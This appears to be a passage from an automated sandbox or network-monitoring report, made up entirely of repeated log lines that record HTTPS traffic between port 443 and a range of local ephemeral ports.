        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
        Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
        Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
        Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
        Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
        Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
        Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
        Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
        Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
        Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
        Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
        Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
        Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
        Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
        Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
        Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
        Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
        Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
        Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
        Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
        Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
        Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
        Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
        Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
        Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
        Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
        Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
        Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
        Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
